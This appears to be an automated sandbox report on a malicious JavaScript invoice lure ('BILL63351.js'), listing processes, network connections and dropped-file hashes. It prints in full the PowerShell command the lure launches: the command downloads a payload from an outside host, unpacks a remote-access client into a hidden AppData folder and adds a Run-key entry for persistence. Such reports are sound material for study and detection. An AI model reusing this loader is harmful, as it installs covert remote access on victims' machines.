'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $qdQZulxrcLjODJPetdoUbikqRuSmW -Force; $FSDFSSD.attributes='Hidden';$s=$qdQZulxrcLjODJPetdoUbikqRuSmW+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;

C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe

"C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5192 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5908 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL10601.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $ZCImZQTlpULGp='https://boxtechcompany.com/1/GetData.php?7461';$IZtUzYNNReOunQUmIUqVkfdoVrvHlgee=(New-Object System.Net.WebClient).DownloadString($ZCImZQTlpULGp);$IINLLLBDoklTTt=[System.Convert]::FromBase64String($IZtUzYNNReOunQUmIUqVkfdoVrvHlgee);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $keRzOmOdlHhfQWTzLhoha=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $keRzOmOdlHhfQWTzLhoha -PathType Container)) { New-Item -Path $keRzOmOdlHhfQWTzLhoha -ItemType Directory };$p=Join-Path $keRzOmOdlHhfQWTzLhoha 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$IINLLLBDoklTTt);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$keRzOmOdlHhfQWTzLhoha)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $keRzOmOdlHhfQWTzLhoha 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $keRzOmOdlHhfQWTzLhoha -Force; $FSDFSSD.attributes='Hidden';$s=$keRzOmOdlHhfQWTzLhoha+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;

C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe

"C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5004 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:2

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL63351.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $PloRsvrHYwhtLNPidec='https://boxtechcompany.com/1/GetData.php?13982';$BZzdVKTFxUSytwkCkWrbBWxxpvhxeUsMGc=(New-Object System.Net.WebClient).DownloadString($PloRsvrHYwhtLNPidec);$eqEzuySWdZoamCI=[System.Convert]::FromBase64String($BZzdVKTFxUSytwkCkWrbBWxxpvhxeUsMGc);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $RLZeZQGsCLTvWqlepOEruhuLtjvdf=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf -PathType Container)) { New-Item -Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf -ItemType Directory };$p=Join-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$eqEzuySWdZoamCI);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RLZeZQGsCLTvWqlepOEruhuLtjvdf)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $RLZeZQGsCLTvWqlepOEruhuLtjvdf -Force; $FSDFSSD.attributes='Hidden';$s=$RLZeZQGsCLTvWqlepOEruhuLtjvdf+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;

C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe

"C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=1488 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6364 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6588 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6472 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6848 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6852 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=7152 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1684 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5916 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6304 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6380 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1760 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 blawx.com udp
RU 188.127.227.29:80 blawx.com tcp
RU 188.127.227.29:80 blawx.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.238:443 apis.google.com tcp
US 8.8.8.8:53 lh5.googleusercontent.com udp
GB 142.250.180.1:443 lh5.googleusercontent.com tcp
GB 142.250.180.1:443 lh5.googleusercontent.com tcp
US 8.8.8.8:53 29.227.127.188.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.180.1:443 lh5.googleusercontent.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 N/A udp
GB 142.250.179.238:443 play.google.com udp
RU 188.127.227.29:443 blawx.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 184.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 197.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 blawx.com udp
RU 188.127.227.29:443 blawx.com tcp
US 8.8.8.8:53 boxtechcompany.com udp
RU 188.127.224.160:443 boxtechcompany.com tcp
US 8.8.8.8:53 160.224.127.188.in-addr.arpa udp
NL 81.19.137.226:443 N/A tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 172.67.68.212:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 226.137.19.81.in-addr.arpa udp
US 8.8.8.8:53 212.68.67.172.in-addr.arpa udp
GB 142.250.187.238:443 apis.google.com udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
RU 188.127.227.29:443 blawx.com tcp
US 8.8.8.8:53 boxtechcompany.com udp
RU 188.127.224.160:443 boxtechcompany.com tcp
RU 188.127.227.29:443 blawx.com tcp
RU 188.127.224.160:443 boxtechcompany.com tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 3.49.178.192.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 beacons2.gvt2.com udp
SG 172.217.194.94:443 beacons2.gvt2.com tcp
SG 172.217.194.94:443 beacons2.gvt2.com tcp
SG 172.217.194.94:443 beacons2.gvt2.com udp
US 8.8.8.8:53 94.194.217.172.in-addr.arpa udp
RU 188.127.227.29:80 blawx.com tcp
GB 142.250.187.238:443 apis.google.com udp
GB 142.250.180.1:443 lh5.googleusercontent.com udp
RU 188.127.227.29:443 blawx.com tcp
RU 188.127.224.160:443 boxtechcompany.com tcp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
RU 188.127.227.29:443 blawx.com tcp
RU 188.127.224.160:443 boxtechcompany.com tcp
GB 142.250.179.238:443 play.google.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 68.204.58.216.in-addr.arpa udp
GB 142.250.187.238:443 apis.google.com udp
US 8.8.8.8:53 virustotal.com udp
US 216.239.34.21:443 virustotal.com tcp
US 216.239.34.21:443 virustotal.com tcp
US 8.8.8.8:53 www.virustotal.com udp
US 8.8.8.8:53 21.34.239.216.in-addr.arpa udp
US 74.125.34.46:443 www.virustotal.com tcp
US 8.8.8.8:53 www.recaptcha.net udp
GB 142.250.200.3:443 www.recaptcha.net tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 46.34.125.74.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 40.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 recaptcha.net udp
GB 142.250.179.227:443 recaptcha.net tcp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 78.204.58.216.in-addr.arpa udp
GB 142.250.179.227:443 recaptcha.net udp
GB 216.58.204.68:443 www.google.com udp
US 74.125.34.46:443 www.virustotal.com tcp
US 216.239.34.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 beacons.gvt2.com udp
GB 216.58.212.227:443 beacons.gvt2.com tcp
GB 216.58.212.227:443 beacons.gvt2.com udp
US 8.8.8.8:53 227.212.58.216.in-addr.arpa udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
US 216.239.34.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 e2c43.gcp.gvt2.com udp
NL 35.214.142.18:443 e2c43.gcp.gvt2.com tcp
US 8.8.8.8:53 18.142.214.35.in-addr.arpa udp
GB 216.58.212.227:443 beacons.gvt2.com udp
US 8.8.8.8:53 www.virustotal.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp

Files

\??\pipe\crashpad_1260_ULZWCYPJRYRQITGD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 547beaf63ead9326310ac0cb9a7446a8
SHA1 8be1b5f63ff5d27aab4e552c9c768836f017a970
SHA256 7c87b872b7679a3d10f1bd86f18081d99b386ce4512febe54c7f84635bfca3ce
SHA512 2b84824c52b91cf80c9627f4b7caddfd40aabc482f21d15313460b6cac041737acd5bf8640cdedcc2a7f4fcb7f332d48b23589fcd5e0648fcc229ba025038c7b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\b7579423-7d5b-4e1c-b32d-da0e3e3c70be.tmp

MD5 f8c1c1ffcfbe6f7a250f45dee470af83
SHA1 0d5e6a0b9751cb8ef7e0ac1413e9247282d6fea9
SHA256 9dc418de524935dbdf2bac08a6628f9dd24c5ec0ad21c01b4049dba444e6e3b2
SHA512 d957236f0c9eb7f52b043999695907ddf5c3615faea9f702504addb02bc6c053114523a9b4a0fc9bf4625bc5c8a5d2d3a34901f1195511263aa9395bedb6af8e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 1b2250c753297dd79d2a75fd61756788
SHA1 d0d6ab98c3545b98f16fc912dfe9f0b1884d5726
SHA256 7d2134eb37d01077748bf6a147d84b5cf9cf337aac772fcba1b00706d29e32c0
SHA512 be2767510449cce297fc09365732043f5c111b52fc661fb2fd00025225423fbc0e63fc760ba2d7392712b75ac7d0b890c65a7d1126f477f12c3d188781f9ce86

C:\Users\Admin\Downloads\BILL63351.js

MD5 55a8424c9605e6740e33c7f6f265e18e
SHA1 8be8f6e01c8210441eec37492d0ec1dd0a1cf0ef
SHA256 70c56698865a3a31045402db6e4519df4aa27c8b356a6e16c3ed2bd32ef74f7c
SHA512 1df2aa8d6c5b7ea7772e2940f6bf3eb2f4992ee5c8fe3d8ee3651312ef6384a3f59c8e893e6e5e1e7708cecb029ef731097023ba4be5ad9c91e5e04e3a4a4881

memory/4420-132-0x00007FFC830B0000-0x00007FFC83A9C000-memory.dmp

memory/4420-133-0x00000261DB650000-0x00000261DB672000-memory.dmp

memory/4420-134-0x00000261DB730000-0x00000261DB740000-memory.dmp

memory/4420-135-0x00000261DB730000-0x00000261DB740000-memory.dmp

memory/4420-138-0x00000261DB840000-0x00000261DB8B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i4w03yg4.ip3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4420-153-0x00000261DB730000-0x00000261DB740000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 806e07e088867c60cdbb89582f71d806
SHA1 59371b98d0ab9a41b365a596bbffbe0a34645fdb
SHA256 7e91a5b7ed5f20ef06886f0f8c76a1a974d4477b8d8768f35b39ede05215e7ea
SHA512 4412c700dd93f5558945f921402f79a41a5599ce235875822bb01d8cf5f5a2b712aaa3b4e2bf6dfe633d27aaf0ecaa13c036db12591de9fd04c7945bb59ba6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0ec503af8195e2649d252877624684e6
SHA1 5acdb69ca4e31d8d8f60a0ef8868d7cd008504e8
SHA256 f09a2d6c87885efe18ae53c52e19c111537d483262c68dce254250101fdf3570
SHA512 cab05d34351fc84b558027eac47486f1d38b90f72f5b7d81f4a1114061ae8a2ac865110b36103690f9a48c03d54841b06159379bdeda73da49dde0f0cbf36b5d

memory/4420-189-0x00000261DB6F0000-0x00000261DB6FA000-memory.dmp

memory/4420-190-0x00000261DB9C0000-0x00000261DB9D2000-memory.dmp

C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe

MD5 c4f1b50e3111d29774f7525039ff7086
SHA1 57539c95cba0986ec8df0fcdea433e7c71b724c6
SHA256 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

C:\Users\Admin\AppData\Roaming\DIVX911\PCICL32.dll

MD5 83373fe3096a4f8ef973ba189eba914a
SHA1 b00b0a2e94f9dc5270ed8ba9ae2db36cfbe15992
SHA256 bbdff5bc76d68730b4d9d9e2015ca149189cb2484067271be81acff40975b2f2
SHA512 02d4096933432984ee29df353e139d72dbc69e4dc64731a8cbc06d100550f49793ad9392029df83e164712b9d3105479c56a4a98274e92272a32537e0baf2b06

C:\Users\Admin\AppData\Roaming\DIVX911\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\Roaming\DIVX911\MSVCR100.dll

MD5 ff6694101775f777962422e97ebced2d
SHA1 6e418a9c248620f2449a62d11a6511fae02c6659
SHA256 29e44dcbc682943eff80e99c1144177a02e4c5e62ab3f58bf0aa519e5da30048
SHA512 00d9e099cfc40b92b0934b81b15ca18a0f9c8cde2a02067442fa785c6f32a3ccbeef84ec1dc9b7a6a30aa90501adb42cc973bd51587e387bd9019569200dc65e

\Users\Admin\AppData\Roaming\DIVX911\msvcr100.dll

MD5 7b08bbcd3175294954a12c84ec3ac71e
SHA1 7c68bc2c658e655ae249f3c8f84299b3ff561b39
SHA256 322588b9b2ba33653652b239f9ae79581cd9963a7f97281463ef9aa786242726
SHA512 aa9196c4ccc79cb9ca28db00b7627041e4b1b0f732c8b3483187d4116b7d3a52164e28462332d891bfcee309e6f4182c2abe7b4e49cfa48b3701d30b7cebef15

\Users\Admin\AppData\Roaming\DIVX911\msvcr100.dll

MD5 386d863777748ba378aab6a458e80c80
SHA1 55b314039e7a23a65379b185683bb97adb11cc1c
SHA256 8dc19181afca2de010fa1868908f2c6b57601d9a6cb2a87b5ac14272a6c99a6a
SHA512 18f5916e80cac5e25ff67d21e6bac7ae017fbbc07e0a798ecd1f99eb3aa02d38ac0cb2463b7edff18af2964b22107a2e4ee35560e07c160b4f8277c0e1c568eb

\Users\Admin\AppData\Roaming\DIVX911\PCICHEK.DLL

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

\Users\Admin\AppData\Roaming\DIVX911\PCICL32.DLL

MD5 06172470b8d2c5ff80c0edf79ddd1a8d
SHA1 e9582cea9e2c5d458eba8e13839fba8a9fb04c83
SHA256 704dde3e33fa644b783b88c6ff39f0a4ae0cf682b4fefda481a2c10dd7018240
SHA512 d4f98f3ce21b307eedb5175925f8da8f125fc5d030d9e04f349fa72677b6dcfe719933c80b27ff09dbe84889e6b262c1ecd83219f9f7fca6467310ab111783f4

C:\Users\Admin\AppData\Roaming\DIVX911\client32.ini

MD5 5d5a682d300dd44ec669829d77790b31
SHA1 9a124709f1a17f18b61179bfed6797df13e387a2
SHA256 22f3be353ce99ddc16179f0280936fd2626b949efc3dacf0d23c085a98503ec8
SHA512 beff890c9e59d2033a15eda015db137da44ca77a7361f8b1a1ea76a6138806c898f9eac8a7a794ca0dc32e1f3c5e5bd8058a52164652d015df02305786f407e7

C:\Users\Admin\AppData\Roaming\DIVX911\NSM.LIC

MD5 1b41e64c60ca9dfadeb063cd822ab089
SHA1 abfcd51bb120a7eae5bbd9a99624e4abe0c9139d
SHA256 f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d
SHA512 c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

\Users\Admin\AppData\Roaming\DIVX911\HTCTL32.DLL

MD5 c54a2021124656cbc29132c7a86aa527
SHA1 e1bcacb9f753d914156fdcb84ee40eb74fef3493
SHA256 8317d0e55e6efa2a09e657e13a3e3e0e56358e93aa5435ebc8585adcc1d20c0c
SHA512 db71ac7dcdc60151bec66028fd6f23c0300a6e970be20c7432d92e525c52135e03652f651f146b939718570241052959b23eecdeccee2b53892bacb49b8a37b9

C:\Users\Admin\AppData\Roaming\DIVX911\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

memory/4420-265-0x00007FFC830B0000-0x00007FFC83A9C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

MD5 09e5f289ad49d7ae5e9d81eb822e5a84
SHA1 32155fdc11993875e0a78d5614fc6a94ed446209
SHA256 f787b54dc751a5ffe844f85cdd3cdf2b7af7c8c8cc03f83d289c063ec6c145a9
SHA512 d1396bc37988182e1aa9493aa368de335031924ff6df27aea352ac1519f9d4d56275da0442041d4d95900e4bf1538e84b1920dc8fab8ea822c64d10e024c2988

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

MD5 c7ab521a1a8b1c3649d2cd4f0e4debcc
SHA1 727747ec6061a9b02c796cbc3008fccedb6fbd56
SHA256 9f51c04dfb4746b080a7ce95c55e5197ea16f8fcd7b3afdcca238500b28c15a9
SHA512 e851b84e79590d168ce8744d10227bcad4b31deafd0f3058ebf71aab2d93d8ce781e2248bc117893df0dd5eb3998be3a0e224b640b4198b59a58df1819384307

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

MD5 be2b5c9f5f52af8ffc161d6a3d6cbe8a
SHA1 1c0365805d7e013046001223184af6f1a0e4dd10
SHA256 8530583320290fa3ead55ee907a52cb3c10e2e39aaa779744fbdeb4afe4d6086
SHA512 f3bbb7068cb70597b3c9db7cec85eb775d1f275370593dd3760ad75549b03d90f4faec07a481a561521b1797d0f0e1ec9138dd7915b08fc1c21b1eab7e315c30

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a

MD5 c15d33a9508923be839d315a999ab9c7
SHA1 d17f6e786a1464e13d4ec8e842f4eb121b103842
SHA256 65c99d3b9f1a1b905046e30d00a97f2d4d605e565c32917e7a89a35926e04b98
SHA512 959490e7ae26d4821170482d302e8772dd641ffbbe08cfee47f3aa2d7b1126dccd6dec5f1448ca71a4a8602981966ef8790ae0077429857367a33718b5097d06

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009

MD5 de69cf9e514df447d1b0bb16f49d2457
SHA1 2ac78601179c3a63ba3f3f3081556b12ddcaf655
SHA256 c447dd7677b419db7b21dbdfc6277c7816a913ffda76fd2e52702df538de0e49
SHA512 4aebb7e54d88827d4a02808f04901c0d09b756c518202b056a6c0f664948f5585221d16967f546e064187c6545acef15d59b68d0a7a59897bd899d3e9dda37b1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

MD5 716309aab2bca045f9627f63ad79d0bf
SHA1 38804233a29aaf975d557fe14e762c627bef76e0
SHA256 115f6a626ca115d4ad5581b59275327e0e860b30330a52b0f785561332dd2429
